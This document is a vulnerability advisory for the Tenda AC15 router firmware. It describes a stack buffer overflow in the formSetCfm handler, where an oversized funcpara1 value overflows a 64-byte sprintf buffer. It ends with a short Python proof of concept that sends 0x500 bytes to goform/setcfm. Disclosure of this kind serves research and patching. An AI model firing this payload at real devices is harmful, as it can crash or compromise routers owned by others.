Tenda-AC15-setcfm

Overview

The device's official website: https://www.tenda.com.cn/product/overview/AC15.html
Firmware download website: https://www.tenda.com.cn/material/show/102680

Affected version

AC15 V1.0 V15.03.05.19_multi

Vulnerability details

In the Tenda AC15 V1.0 V15.03.05.19_multi firmware has a stack overflow vulnerability located in the formSetCfm function. This function accepts the funcpara1 parameter from a POST request and passes it to the sub_2BA8C function. Within sub_2BA8C, the array s is fixed at 64 bytes. However, since the user has control over the input of funcpara1, the statement sprintf(s, "%s.list%d", a1, v11); leads to a buffer overflow. The user-supplied funcpara1 can exceed the capacity of the s array, thus triggering this security vulnerability.

POC

import requests as re

url_base = '<http://192.168.84.101/>'

url = url_base + 'goform/setcfm'
data = {
        'funcname': 'save_list_data', 
        'funcpara1': b'a'*0x500, 
        'funcpara2':'aaaaaa'
}

res = re.post(url, data=data)